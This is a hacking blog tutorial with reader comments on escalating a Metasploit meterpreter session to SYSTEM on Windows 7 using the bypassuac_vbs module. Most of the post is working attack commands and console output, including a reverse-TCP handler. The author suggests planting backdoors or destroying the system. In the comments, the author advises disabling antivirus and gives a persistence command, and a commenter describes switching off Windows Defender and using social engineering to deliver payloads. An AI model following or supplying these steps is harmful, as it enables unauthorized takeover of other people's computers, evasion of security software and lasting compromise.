Hacking any windows system is an easy process with metasploit. We can use many techniques to compromise windows by either exploiting a remote code execution or malicious file attack. Code is often embedded with genuine applications or executed remotely on an application with limited privileges. When we use getsystem command it will return an error “access denied”.

To get system level or admin privilege we have to execute it as admin which is monitored my windows UAC.  It can check for verified publisher and certificate info. Asking for admin privilege in a malicious executable is a bad practice. A malicious file asking for privileges can alert the user whereas a code  without admin privilege can run in background without causing much distraction.

In metasploit we have plenty of exploits to escalate privilege of an existing meterpreter session. Here we are using bypassuac_vbs exploit to escalate meterpreter privilege. This exploit can bypass UAC in background without asking confirmation. We have other exploits like bypassuac and bypassuac_injection but they can alert the user.

 Demo Video




You need an updated version of metasploit msf5 is used in this tutorial. This exploit is for a previously compromised system i.e we already need a meterpreter session running in the background. check my blog on How to hack windows 10 using kali linux remotely with metasploit 2016 if you don’t know how to compromise any windows system (win 10/8/8.1/7/vista/xp).

+ — –=[ metasploit v4.11.5-2016010401 ]
+ — –=[ 1518 exploits – 875 auxiliary – 257 post ]
+ — –=[ 437 payloads – 37 encoders – 8 nops ]
+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 444
lport => 444
msf exploit(handler) > exploit[*] Started reverse TCP handler on
[*] Starting the payload handler…
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 2 opened ( -> at 2016-07-17 06:08:32 -0400meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >

As you can see getsystem command didn’t work. Now background the session using the command below

meterpreter > background
[*] Backgrounding session 1…

bypassuac exploit

Once you have got a session, background it in metasploit handler and change the module to bypassuac_vbs.

msf exploit(handler) > use exploit/windows/local/bypassuac_vbs

Set the session id

msf exploit(bypassuac_vbs) > set session 1
session => 1

Exploit the target, a new meterpreter session will be spawned

msf exploit(bypassuac_vbs) > exploit[*] Started reverse TCP handler on
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level…
[+] Part of Administrators group! Continuing…
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing…
[*] Uploading the Payload VBS to the filesystem…
[*] Sending stage (957487 bytes) to
[*] Meterpreter session 3 opened ( -> at 2016-07-17 06:12:47 -0400
[+] Deleted C:\Users\user\AppData\Local\Temp\ZPqcIxHe.vbs
meterpreter >

the new meterpreter session will run with escalated privileges, try getsystem command to check privileges. Once you got the system you are the admin/owner of that pc

meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Now you can access to system files and create multiple backdoors or persist the session in system directory or you can simply destroy the whole system

 Any doubts or questions? Ask it on our new hackers Q and A forum

Ask a Question

Susmith Krishnan

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you


YummY · August 25, 2016 at 4:04 pm

Do you guys have twitter? How to contact you?

Darwin · January 18, 2017 at 11:15 am

So you could access the windows user interface of the compromised system without having the user open an infected .exe?

    susmith HCK · January 18, 2017 at 10:19 pm

    NO, for that u need a persistent shell.

Mukul Gaur · April 22, 2017 at 6:05 pm

Great Blog

Cryptr · May 11, 2017 at 7:27 am

I’ve tried several ways to escalate without luck. Will the vbs method get caught by defender when the payload is sent to the target system? On most of the other attempts the payload was caught. I’m hoping I don’t need to encrypt the payload before it’s sent.

    susmith HCK · May 11, 2017 at 5:20 pm

    vbs is less likely to be detected, because its usually treated as simple program used by system. Unless you run a scan on the file specifically mostly it will remain undetected. The moment you got privilege disable AV.

Cryptr · May 12, 2017 at 2:13 am

Yes I can confirm that vbs does not even work for Windows 10 however the ask does work with modifications. In other words you have to create a program package the payload inside that program along with registry modifications that shut off Windows Defender once Defender is down you can execute the payload and escalate your privileges as normal

    Cryptr · May 12, 2017 at 2:18 am

    A little caveat to that unfortunately you have to use really good social engineering skills to get your target to click on the package and install it

    Cryptr · May 12, 2017 at 3:50 pm

    Vbs does work on windows 7 and was able to get it working with little effort with defender up.

Aris Melachroinos · May 13, 2017 at 7:57 pm

how do i persist the session in system directory?

    susmith HCK · May 14, 2017 at 11:08 am

    Run persistent meterpreter script example: run persistence -U -i 5 -p 555 -r

aime · May 25, 2017 at 2:49 pm

I am getting the following error (Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module) as the local user does not belong to admin group :

msf exploit(bypassuac_vbs) > exploit

[*] Started reverse TCP handler on
[+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
[*] UAC is Enabled, checking level…
[-] Exploit aborted due to failure: no-access: Not in admins group, cannot escalate with this module
[*] Exploit completed, but no session was created.
msf exploit(bypassuac_vbs) >

    susmith HCK · May 27, 2017 at 10:12 pm

    This exploit wont work on the target system because of its group policy. i.e. target is secured and its not vulnerable to this exploit.

      blabla · September 2, 2017 at 11:35 pm

      It’s like that for me too
      what can we do?

sergio · June 3, 2017 at 11:26 pm

Funciona, gracias por compartir

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.